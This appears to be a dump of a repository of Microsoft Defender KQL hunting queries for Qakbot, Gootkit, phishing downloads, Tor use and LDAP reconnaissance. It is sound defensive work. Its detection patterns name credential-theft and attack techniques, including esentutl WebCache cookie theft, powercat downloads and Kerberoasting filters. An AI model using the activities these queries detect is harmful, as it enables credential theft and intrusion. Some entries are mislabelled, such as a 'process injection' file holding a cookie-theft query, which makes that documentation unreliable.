can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection Team ================================================ FILE: Defense evasion/qakbot-campaign-process-injection.md ================================================ # Process injection by Qakbot malware This query was originally published in the threat analytics report, *Qakbot blight lingers, seeds ransomware* [Qakbot](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/) is malware that steals login credentials from banking and financial services. It has been deployed against small businesses as well as major corporations. Some outbreaks have involved targeted ransomware campaigns that use a similar set of techniques. Links to related queries are listed under [See also](#See-also). The following query detects if Qakbot has injected code into the *ping.exe* process, to evade security and access credentials. ## Query ```Kusto DeviceProcessEvents | where FileName == "esentutl.exe" | where ProcessCommandLine has "WebCache" | where ProcessCommandLine has_any ("V01", "/s", "/d") | project ProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | v | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Registry edits by campaigns using Qakbot malware](..\Persistence\qakbot-campaign-self-deletion.md) * [Self-deletion by Qakbot malware](..\Defense evasion\qakbot-campaign-registry-edit.md) * [Browser cookie theft by campaigns using Qakbot malware](..\Discovery\qakbot-campaign-esentutl.md) * [Outlook email access by campaigns using Qakbot malware](..\Discovery\qakbot-campaign-outlook.md) * [Javascript use by Qakbot malware](..\Execution\qakbot-campaign-suspicious-javascript.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Defense evasion/qakbot-campaign-self-deletion.md ================================================ # Self-deletion by Qakbot malware This query was originally published in the threat analytics report, *Qakbot blight lingers, seeds ransomware* [Qakbot](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/) is malware that steals login credentials from banking and financial services. It has been deployed against small businesses as well as major corporations. Some outbreaks have involved targeted ransomware campaigns that use a similar set of techniques. Links to related queries are listed under [See also](#See-also). The following query detects if an instance of Qakbot has attempted to overwrite its original binary. ## Query ```Kusto DeviceProcessEvents | where FileName =~ "ping.exe" | where InitiatingProcessFileName =~ "cmd.exe" | where InitiatingProcessCommandLine has "calc.exe" and InitiatingProcessCommandLine has "-n 6" and InitiatingProcessCommandLine has "127.0.0.1" | project ProcessCommandLine, InitiatingProcessCommandLine, InitiatingProcessParentFileName, DeviceId, Timestamp ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## See also * [Registry edits by campaigns using Qakbot malware](..\Persistence\qakbot-campaign-registry-edit.md) * [Process injection by Qakbot malware](..\Defense evasion\qakbot-campaign-process-injection.md) * [Browser cookie theft by campaigns using Qakbot malware](..\Discovery\qakbot-campaign-esentutl.md) * [Outlook email access by campaigns using Qakbot malware](..\Discovery\qakbot-campaign-outlook.md) * [Javascript use by Qakbot malware](..\Execution\qakbot-campaign-suspicious-javascript.md) ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Delivery/Doc attachment with link to download.txt ================================================ // This query looks for a Word document attachment, from which a link was clicked, and after which there was a browser download. // This query is not noisy, but most of its results are clean. // It can also hserve as reference for other queries on email attachments, on browser downloads or for queries that join multiple events by time. // Tags: #EmailAttachment, #WordLink, #BrowserDownload, #Phishing, #DedupFileCreate // Implementation comment #1: Matching events by time // Matching the 3 different events (saving attachment, clicking on link, downloading file) is done purely by time difference - so could sometimes link together unrelated events. // Doing a more exact lookup would create a much more complex query due to // Implementation comment #2: Deduping DeviceFileEvents // Oftentimes there are multiple DeviceFileEvents for a single file - e.g. if the file keeps being appended into before being closed. // So, we query only for the last reported file state to ignore intermediate file states. // Explaining the underlying data: // BrowserLaunchedToOpenUrl event: // This query uses the BrowserLaunchedToOpenUrl event, that includes clicks on http:// or https:// links (clicks outside of browsers), or on .lnk files // For this event, RemoteUrl contains the opened URL. let minTimeRange = ago(7d); let wordLinks = DeviceEvents // Filter on click on links from WinWord | where Timestamp > minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl) and InitiatingProcessFileName =~ "winword.exe" | project ClickTime=Timestamp, DeviceId, DeviceName, ClickUrl=RemoteUrl; let docAttachments = DeviceFileEvents | where Timestamp > minTimeRange // Query for common document file extensions and (FileName endswith ".docx" or FileName endswith ".docm" or FileName endswith ".doc") // Query for files saved from email clients such as the Office Outlook app or the Windows Mail app and InitiatingProcessFileName in~ ("outlook.exe", "hxoutlook.exe") | summarize AttachmentSaveTime=min(Timestamp) by AttachmentName=FileName, DeviceId; let browserDownloads = DeviceFileEvents | where Timestamp > minTimeRange // Query for files created by common browsers and InitiatingProcessFileName in~ ("browser_broker.exe", "chrome.exe", "iexplore.exe", "firefox.exe") // Exclude JS files that are used for loading sites (but still query for JS files that are known to be downloaded) and not (FileName endswith ".js" and isempty(FileOriginUrl)) // Further filter to exclude file extensions that are less indicative of an attack (when there were already previously a doc attachment that included a link) | where FileName !endswith ".partial" and FileName !endswith ".docx" | summarize (Timestamp, SHA1) = argmax(Timestamp, SHA1) by FileName, DeviceId, FileOriginUrl; // Perf tip: start the joins from the smallest table (put it on the left-most side of the joins) wordLinks | join kind= inner (docAttachments) on DeviceId | where ClickTime - AttachmentSaveTime between (0min..3min) | join kind= inner (browserDownloads) on DeviceId | where Timestamp - ClickTime between (0min..3min) // Aggregating multiple "attachments" together - because oftentimes the same file is stored multiple times under different names | summarize Attachments=makeset(AttachmentName), AttachmentSaveTime=min(AttachmentSaveTime), ClickTime=min(ClickTime) by // Downloaded file details bin(Timestamp, 1tick), FileName, FileOriginUrl, ClickUrl, SHA1, DeviceName, DeviceId ================================================ FILE: Delivery/Dropbox downloads linked from other site.txt ================================================ // This query looks for user content downloads from dropbox that originate from a link/redirect from a 3rd party site. // File sharing sites such as Dropbox are often used for hosting malware on a reputable site. // Read more about download URL data and about this attack vector in this blog post: // https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-Browser-downloads/td-p/220454 // Tags: #DownloadUrl, #Referer, #Dropbox DeviceFileEvents | where Timestamp > ago(7d) and FileOriginUrl startswith "https://dl.dropboxusercontent.com/" and isnotempty(FileOriginReferrerUrl) and FileOriginReferrerUrl !startswith "https://www.dropbox.com/" | project FileOriginReferrerUrl, FileName ================================================ FILE: Delivery/Email link + download + SmartScreen warning.txt ================================================ // Look for links opened from outlook.exe, followed by a browser download and then a SmartScreen app warning that was ignored by the user. // Read more about these events and this hunting approach in this post: https://techcommunity.microsoft.com/t5/forums/editpage/board-id/WDATPActor/message-id/34 // Data availability: SmartScreen events are available only on Windows 10 version 1703 and onwards. // Tags: #EmailLink, #BrowserDownload, #SmartScreen let smartscreenAppWarnings = // Query for SmartScreen warnings of unknown executed applications DeviceEvents | where ActionType == "SmartScreenAppWarning" | project WarnTime=Timestamp, DeviceName, WarnedFileName=FileName, WarnedSHA1=SHA1, ActivityId=extractjson("$.ActivityId", AdditionalFields, typeof(string)) // Select only warnings that the user has decided to ignore and has executed the app. | join kind=leftsemi ( DeviceEvents | where ActionType == "SmartScreenUserOverride" | project DeviceName, ActivityId=extractjson("$.ActivityId", AdditionalFields, typeof(string))) on DeviceName, ActivityId | project-away ActivityId; // Query for links opened from outlook, that are close in time to a SmartScreen warning let emailLinksNearSmartScreenWarnings = DeviceEvents | where ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl) and InitiatingProcessFileName =~ "outlook.exe" | extend WasOutlookSafeLink=(tostring(parse_url(RemoteUrl).Host) endswith "safelinks.protection.outlook.com") | project DeviceName, MailLinkTime=Timestamp, MailLink=iff(WasOutlookSafeLink, url_decode(tostring(parse_url(RemoteUrl)["Query Parameters"]["url"])), RemoteUrl) | join kind=inner smartscreenAppWarnings on DeviceName | where (WarnTime-MailLinkTime) between (0min..4min); // Add the browser download event to tie in all the dots DeviceFileEvents | where isnotempty(FileOriginUrl) and InitiatingProcessFileName in~ ("chrome.exe", "browser_broker.exe") | project FileName, FileOriginUrl, FileOriginReferrerUrl, DeviceName, Timestamp, SHA1 | join kind=inner emailLinksNearSmartScreenWarnings on DeviceName | where (Timestamp-MailLinkTime) between (0min..3min) and (WarnTime-Timestamp) between (0min..1min) | project FileName, MailLink, FileOriginUrl, FileOriginReferrerUrl, WarnedFileName, DeviceName, SHA1, WarnedSHA1, Timestamp | distinct * ================================================ FILE: Delivery/Gootkit-malware.md ================================================ # Gootkit malware delivery and C2 This query was originally published on Twitter, by [@MsftSecIntel](https://twitter.com/MsftSecIntel). Gootkit is malware that started life as a banking trojan, and has since extended its capabilities to allow for a variety of malicious activities. The query helps find events related to Gootkit downloads and command-and-control behavior. ## Query ``` Kusto AlertInfo | where Title =~ "Suspected delivery of Gootkit malware" // Below section is to surface active follow-on Command and Control as a result of the above behavior. Comment out the below joins to see // only file create events where the malware may be present but has not yet been executed. //// // Get alert evidence | join AlertEvidence on $left.AlertId == $right.AlertId // Look for C2 | join DeviceNetworkEvents on $left.DeviceId == $right.DeviceId | where InitiatingProcessFileName =~ "wscript.exe" and InitiatingProcessCommandLine has ".zip" and InitiatingProcessCommandLine has ".js" | summarize by RemoteUrl, RemoteIP , DeviceId, InitiatingProcessCommandLine, Timestamp, InitiatingProcessFileName, AlertId, Title, AccountName ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | v | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Delivery/Open email link.txt ================================================ // Query for links opened from mail apps – if a detection occurred right afterwards. // As there are many links opened from mails, to have a successful hunt we should have some filter or join with some other signal, // such as suspicious processes, network connections, etc. // Therefore, in this example, we query for alerts that might be related to links sent via email. // This could be indicative of a phishing or spear-phishing attacks. // Tags: #EmailLink, #Phishing, #GetNearbyAlerts // Explaining the underlying data: // This query uses the BrowserLaunchedToOpenUrl event, that includes clicks on http:// or https:// links (clicks outside of browsers), or on .lnk files // For this event, RemoteUrl contains the opened URL. let minTimeRange = ago(7d); let outlookLinks = DeviceEvents // Filter on click on links from outlook | where Timestamp > minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl) | where // outlook.exe is the Office Outlook app InitiatingProcessFileName =~ "outlook.exe" // RuntimeBroker.exe opens links for all apps from the Windows store, including the Windows Mail app (HxOutlook.exe). // However, it will also include some links opened from other apps. or InitiatingProcessFileName =~ "runtimebroker.exe" | project Timestamp, DeviceId, DeviceName, RemoteUrl, InitiatingProcessFileName, ParsedUrl=parse_url(RemoteUrl) // When applicable, parse the link sent via email from the clicked O365 ATP SafeLink | extend WasOutlookSafeLink=(tostring(ParsedUrl.Host) endswith "safelinks.protection.outlook.com") | project Timestamp, DeviceId, DeviceName, WasOutlookSafeLink, InitiatingProcessFileName, OpenedLink=iff(WasOutlookSafeLink, url_decode(tostring(ParsedUrl["Query Parameters"]["url"])), RemoteUrl); let alerts = DeviceAlertEvents | summarize (FirstDetectedActivity, Title)=argmin(Timestamp, Title) by AlertId, DeviceId // Filter alerts that include events from before the queried time period | where FirstDetectedActivity > minTimeRange; // Join the two together - looking for alerts that are right after an abnormal network logon alerts | join kind=inner (outlookLinks) on DeviceId | where FirstDetectedActivity - Timestamp between (0min..3min) // If there are multiple alerts close to a single click-on-link, aggregate them together to a single row // Note: bin(Timestamp, 1tick) is used because when summarizing by a datetime field, the default "bin" used is 1-hour. | summarize FirstDetectedActivity=min(FirstDetectedActivity), AlertTitles=makeset(Title) by OpenedLink, InitiatingProcessFileName, Timestamp=bin(Timestamp, 1tick), DeviceName, DeviceId, WasOutlookSafeLink // Query for links opened from mail apps – if a detection occurred right afterwards. - MTP Schema // As there are many links opened from mails, to have a successful hunt we should have some filter or join with some other signal, // such as suspicious processes, network connections, etc. // Therefore, in this example, we query for alerts that might be related to links sent via email. // This could be indicative of a phishing or spear-phishing attacks. // Tags: #EmailLink, #Phishing, #GetNearbyAlerts // Explaining the underlying data: // This query uses the BrowserLaunchedToOpenUrl event, that includes clicks on http:// or https:// links (clicks outside of browsers), or on .lnk files // For this event, RemoteUrl contains the opened URL. let minTimeRange = ago(7d); let outlookLinks = DeviceEvents // Filter on click on links from outlook | where Timestamp > minTimeRange and ActionType == "BrowserLaunchedToOpenUrl" and isnotempty(RemoteUrl) | where // outlook.exe is the Office Outlook app InitiatingProcessFileName =~ "outlook.exe" // RuntimeBroker.exe opens links for all apps from the Windows store, including the Windows Mail app (HxOutlook.exe). // However, it will also include some links opened from other apps. or InitiatingProcessFileName =~ "runtimebroker.exe" | project Timestamp, DeviceId, DeviceName, RemoteUrl, InitiatingProcessFileName, ParsedUrl=parse_url(RemoteUrl) // When applicable, parse the link sent via email from the clicked O365 ATP SafeLink | extend WasOutlookSafeLink=(tostring(ParsedUrl.Host) endswith "safelinks.protection.outlook.com") | project Timestamp, DeviceId, DeviceName, WasOutlookSafeLink, InitiatingProcessFileName, OpenedLink=iff(WasOutlookSafeLink, url_decode(tostring(ParsedUrl["Query Parameters"]["url"])), RemoteUrl); let alerts = AlertInfo | join AlertEvidence on AlertId | summarize (FirstDetectedActivity, Title)=argmin(Timestamp, Title) by AlertId, DeviceId // Filter alerts that include events from before the queried time period | where FirstDetectedActivity > minTimeRange; // Join the two together - looking for alerts that are right after an abnormal network logon alerts | join kind=inner (outlookLinks) on DeviceId | where FirstDetectedActivity - Timestamp between (0min..3min) // If there are multiple alerts close to a single click-on-link, aggregate them together to a single row // Note: bin(Timestamp, 1tick) is used because when summarizing by a datetime field, the default "bin" used is 1-hour. | summarize FirstDetectedActivity=min(FirstDetectedActivity), AlertTitles=makeset(Title) by OpenedLink, InitiatingProcessFileName, Timestamp=bin(Timestamp, 1tick), DeviceName, DeviceId, WasOutlookSafeLink ================================================ FILE: Delivery/Pivot from detections to related downloads.txt ================================================ // Pivot from downloads detected by Windows Defender Antivirus to other files downloaded from the same sites // To learn more about the download URL info that is available and see other sample queries, // check out this blog post: https://techcommunity.microsoft.com/t5/Threat-Intelligence/Hunting-tip-of-the-month-Browser-downloads/td-p/220454 let detectedDownloads = DeviceEvents | where ActionType == "AntivirusDetection" and isnotempty(FileOriginUrl) | project Timestamp, FileOriginUrl, FileName, DeviceId, ThreatName=tostring(parse_json(AdditionalFields).ThreatName) // Filter out less severe threat categories on which we do not want to pivot | where ThreatName !startswith "PUA" and ThreatName !startswith "SoftwareBundler:" and FileOriginUrl != "about:internet"; let detectedDownloadsSummary = detectedDownloads // Get a few examples for each detected Host: // up to 4 filenames, up to 4 threat names, one full URL) | summarize DetectedUrl=any(FileOriginUrl), DetectedFiles=makeset(FileName, 4), ThreatNames=makeset(ThreatName, 4) by Host=tostring(parse_url(FileOriginUrl).Host); // Query for downloads from sites from which other downloads were detected by Windows Defender Antivirus DeviceFileEvents | where isnotempty(FileOriginUrl) | project FileName, FileOriginUrl, DeviceId, Timestamp, Host=tostring(parse_url(FileOriginUrl).Host), SHA1 // Filter downloads from hosts serving detected files | join kind=inner(detectedDownloadsSummary) on Host // Filter out download file create events that were also detected. // This is needed because sometimes both of these events will be reported, // and sometimes only the AntivirusDetection event - depending on timing. | join kind=leftanti(detectedDownloads) on DeviceId, FileOriginUrl // Summarize a single row per host - with the machines count // and an example event for a missed download (select the last event) | summarize MachineCount=dcount(DeviceId), arg_max(Timestamp, *) by Host // Filter out common hosts, as they probably ones that also serve benign files | where MachineCount < 20 | project Host, MachineCount, DeviceId, FileName, DetectedFiles, FileOriginUrl, DetectedUrl, ThreatNames, Timestamp, SHA1 | order by MachineCount desc ================================================ FILE: Delivery/Qakbot Craigslist Domains.md ================================================ # Qakbot Craigslist Domains Qakbot operators have been abusing the Craigslist messaging system to send malicious emails. These emails contain non-clickable links to malicious domains impersonating Craigslist, which the user is instructed to manually type into the address bar to access. ## Query This query looks for network connections to domains impersonating Craigslist which are associated with the delivery of Qakbot. ``` DeviceNetworkEvents | where RemoteUrl matches regex @"abuse\.[a-zA-Z]\d{2}-craigslist\.org" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | v | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | | | | Ransomware | | | ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Delivery/detect-jscript-file-creation.md ================================================ # Detect .jse file creation events This query was originally published in the threat analytics report, *Emulation-evading JavaScripts*. Attackers in several ransomware campaigns have employed heavily obfuscated JavaScript code, in order to implant malware or execute malicious commands. The obfuscation is intended to help the code evade security systems and potentially escape sandbox environments. The following query detects the creation of files with a *.jse* extension. Certain ransomware campaigns, such as [Emotet](https://www.microsoft.com/security/blog/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/), are known to employ encrypted JavaScript code that is saved to the target as *.jse* files. See [Detect potentially malicious .jse launch by File Explorer or Word](../Execution/jse-launched-by-word.md) for a similar technique. ## Query ```Kusto ​// Creation of any .jse file, including legitimate and malicious ones DeviceFileEvents | where Timestamp > ago(7d) | where FileName endswith ".jse" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |-|-|-| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | v | | | Credential Access | | | | Discovery | | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Microsoft Threat Protection team ================================================ FILE: Delivery/powercat-download.md ================================================ # Powercat exploitation tool downloaded This query was originally published in the threat analytics report, "Exchange Server zero-days exploited in the wild". In early March 2021, Microsoft released [patches](https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/) for four different zero-day vulnerabilities affecting Microsoft Exchange Server. The vulnerabilities were being used in a coordinated attack. For more information on the vulnerabilities, visit the following links: * [CVE-2021-26855](https://nvd.nist.gov/vuln/detail/CVE-2021-26855) * [CVE-2021-26857](https://nvd.nist.gov/vuln/detail/CVE-2021-26857) * [CVE-2021-26858](https://nvd.nist.gov/vuln/detail/CVE-2021-26858) * [CVE-2021-27065](https://nvd.nist.gov/vuln/detail/CVE-2021-27065) The following query detects downloads of *powercat*, an exploitation tool for PowerShell. Although associated with these zero-day attacks, powercat is a multi-purpose tool that is also used by other groups of attackers. More queries related to this threat can be found under the [See also](#See-also) section of this page. ## Query ```Kusto DeviceProcessEvents | where FileName has_any ("cmd.exe", "powershell.exe", "PowerShell_ISE.exe") | where ProcessCommandLine endswith "powercat.ps1" ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | v | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | v | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | v | | | Impact | | | | Vulnerability | | | | Exploit | | | | Misconfiguration | | | | Malware, component | v | | | Ransomware | | | ## See also * [Reverse shell loaded using Nishang Invoke-PowerShellTcpOneLine technique](../Execution/reverse-shell-nishang.md) * [Procdump dumping LSASS credentials](../Credential%20Access/procdump-lsass-credentials.md) * [7-ZIP used by attackers to prepare data for exfiltration](../Exfiltration/7-zip-prep-for-exfiltration.md) * [Exchange PowerShell snap-in being loaded](../Exfiltration/exchange-powershell-snapin-loaded.md) * [Exchange vulnerability creating web shells via UMWorkerProcess](../Execution/umworkerprocess-creating-webshell.md) * [Exchange Server IIS dropping web shells and other artifacts](../Execution/exchange-iis-worker-dropping-webshell.md) * [Exchange vulnerability launching subprocesses through UMWorkerProcess](../Execution/umworkerprocess-unusual-subprocess-activity.md) * [Base64-encoded Nishang commands for loading reverse shell](../Execution/reverse-shell-nishang-base64.md) ## Contributor info **Contributor:** Microsoft 365 Defender team ================================================ FILE: Discovery/Detect-Not-Active-AD-User-Accounts.md ================================================ # Detect not active AD user accounts // Detect Active Directory service accounts that are not active because their last logon was more than 14 days ago // Replace XXX on line 4 with the naming convention start of your Active Directory service accounts ## Query ``` IdentityLogonEvents | project Timestamp, AccountName, DeviceName, LogonType | where AccountName startswith "XXX" | summarize LastLogon = max(Timestamp) by AccountName, LogonType, DeviceName | where LastLogon < ago(14d) ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | X | | | Discovery | X | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** < Milad Aslaner > **GitHub alias:** < https://github.com/MiladMSFT > **Organization:** < Microsoft > **Contact info:** < Twitter: MiladMSFT > ================================================ FILE: Discovery/DetectTorRelayConnectivity.md ================================================ # Detect Tor Relay Connectivity This advanced hunting query detects processes communicating with known Tor relay IP addresses. The public URL in the query is updated daily at 12PM and 12AM UTC. CSV source is the Tor Project API, obtained with: https://github.com/Dylan-J/Tor-Project-Statistics ## Query ``` let TorRelayData = ( externaldata (Nickname:string,Fingerprint:string,EntryAddress:string,IPv4Address:string,IPv4Port:string,IPv6Address:string,AddressType:string,Hostname:string,CountryCode:string,IsRunning:bool,RelayPublishDate:string,LastChangedIPData:string) [h@'https://msde.blob.core.windows.net/public/TorRelayIPs.csv'] with (ignoreFirstRecord=true,format="csv") | where AddressType == "IPv4" ); TorRelayData | join kind=inner DeviceNetworkEvents on $left.IPv4Address == $right.RemoteIP | join kind=inner (DeviceInfo | distinct DeviceId, PublicIP) on DeviceId | project Timestamp, DeviceId, LocalPublicIP = PublicIP, LocalIP, RemoteIP, TorIP = IPv4Address, Hostname, CountryCode, ActionType, InitiatingProcessFileName, InitiatingProcessFolderPath ``` ## Category This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | V | | | Lateral movement | | | | Collection | | | | Command and control | V | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributor info **Contributor:** Dylan Jones **GitHub alias:** Dylan-J **Organization:** Microsoft **Contact info:** Twitter - @dylface2 ================================================ FILE: Discovery/DetectTorrentUse.txt ================================================ //Custom detection to find use of torrenting software or browsing related to torrents DeviceNetworkEvents | where Timestamp > ago(7d) | where RemoteUrl has "torrent" or RemoteUrl has "vuze" or RemoteUrl has "azureus" or RemoteUrl endswith ".tor" or InitiatingProcessFileName has "torrent" or InitiatingProcessFileName has "vuze" or InitiatingProcessFileName contains "azureus" | project Timestamp, ReportId, DeviceId, DeviceName, InitiatingProcessFileName, RemoteUrl , RemoteIP , RemotePort ================================================ FILE: Discovery/Discover hosts doing possible network scans.txt ================================================ // Looking for high volume queries against a given RemoteIP, per DeviceName, RemotePort and Process // Please change the Timestamp window according your preference/objective, as also the subnet ranges that you want to analyze against let remotePortCountThreshold = 10; // Please change the min value, for a host reaching out to remote ports on a remote IP, that you consider to be threshold for a suspicious behavior DeviceNetworkEvents | where Timestamp > ago(1d) and RemoteIP startswith "172.16" or RemoteIP startswith "192.168" | summarize by DeviceName, RemoteIP, RemotePort, InitiatingProcessFileName | summarize RemotePortCount=dcount(RemotePort) by DeviceName, RemoteIP, InitiatingProcessFileName | where RemotePortCount > remotePortCountThreshold ================================================ FILE: Discovery/Enumeration of users & groups for lateral movement.txt ================================================ // The query finds attempts to list users or groups using Net commands DeviceProcessEvents | where Timestamp > ago(14d) | where FileName == 'net.exe' and AccountName != "" and ProcessCommandLine !contains '\\' and ProcessCommandLine !contains '/add' | where (ProcessCommandLine contains ' user ' or ProcessCommandLine contains ' group ') and (ProcessCommandLine contains ' /do' or ProcessCommandLine contains ' /domain') | extend Target = extract("(?i)[user|group] (\"*[a-zA-Z0-9-_ ]+\"*)", 1, ProcessCommandLine) | filter Target != '' | project AccountName, Target, ProcessCommandLine, DeviceName, Timestamp | sort by AccountName, Target ================================================ FILE: Discovery/MultipleLdaps.md ================================================ # Detect multiple LDAP queries Detect multiple Active Directory LDAP queries made in bin time Replace 10 on line 1 with your desired thershold Replace 1m on line 2 with your desired bin time ## Query ``` let Thershold = 10; let BinTime = 1m; IdentityQueryEvents | where ActionType == "LDAP query" | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter | summarize NumberOfLdapQueries = count(), NumberOfDistinctLdapQueries = dcount(SearchFilter) by DeviceName, bin(Timestamp, BinTime) | where NumberOfDistinctLdapQueries > Thershold ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | X | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributors info **Contributor:** Mor Rubin **GitHub alias:** https://github.com/morRubin **Organization:** Microsoft **Contact info:** Twitter: MorRubin **Contributor:** Oz Soprin **GitHub alias:** https://github.com/ozSoprin **Organization:** Microsoft **Contact info:** Twitter: ozSoprin ================================================ FILE: Discovery/MultipleSensitiveLdaps.md ================================================ # Detect multiple sensitive LDAP queries Detect multiple sensitive Active Directory LDAP queries made in bin time Sensitive queries defined as Roasting or sensitive objects queries Replace 10 on line 6 with your desired thershold Replace 1m on line 7 with your desired bin time This LDAP query cover Rubeus, Kerberoast, BloodHound tools ## Query ``` let SensitiveObjects = "[\"Administrators\", \"Domain Controllers\", \"Domain Admins\", \"Account Operators\", \"Backup Operators\", \"DnsAdmin\", \"Enterprise Admins\", \"Group Policy Creator Owners\"]"; let ASREP_ROASTING = "userAccountControl:1.2.840.113556.1.4.803:=4194304"; let ASREP_ROASTING1 = "userAccountControl|4194304"; let ASREP_ROASTING2 = "userAccountControl&4194304"; let KERBEROASTING = "serviceprincipalname=*"; let Thershold = 10; let BinTime = 1m; let SensitiveQueries = ( IdentityQueryEvents | where ActionType == "LDAP query" | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter | where SensitiveObjects contains QueryTarget or SearchFilter contains "admincount=1"); let Roasting = ( IdentityQueryEvents | where ActionType == "LDAP query" | parse Query with * "Search Scope: " SearchScope ", Base Object:" BaseObject ", Search Filter: " SearchFilter | where SearchFilter contains ASREP_ROASTING or SearchFilter contains ASREP_ROASTING1 or SearchFilter contains ASREP_ROASTING2 or SearchFilter contains KERBEROASTING); union SensitiveQueries, Roasting | summarize NumberOfLdapQueries = count(), NumberOfDistinctLdapQueries = dcount(SearchFilter) by DeviceName, bin(Timestamp, BinTime) | where NumberOfDistinctLdapQueries > Thershold ``` ## Category This query can be used the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states. | Technique, tactic, or state | Covered? (v=yes) | Notes | |------------------------|----------|-------| | Initial access | | | | Execution | | | | Persistence | | | | Privilege escalation | | | | Defense evasion | | | | Credential Access | | | | Discovery | X | | | Lateral movement | | | | Collection | | | | Command and control | | | | Exfiltration | | | | Impact | | | | Vulnerability | | | | Misconfiguration | | | | Malware, component | | | ## Contributors info **Contributor:** Mor Rubin **GitHub alias:** https://github.com/morRubin **Organization:** Microsoft **Contact info:** Twitter: MorRubin **Contributor:** Oz Soprin **GitHub alias:** https://github.com/ozSoprin **Organization:** Microsoft **Contact info:** Twitter: 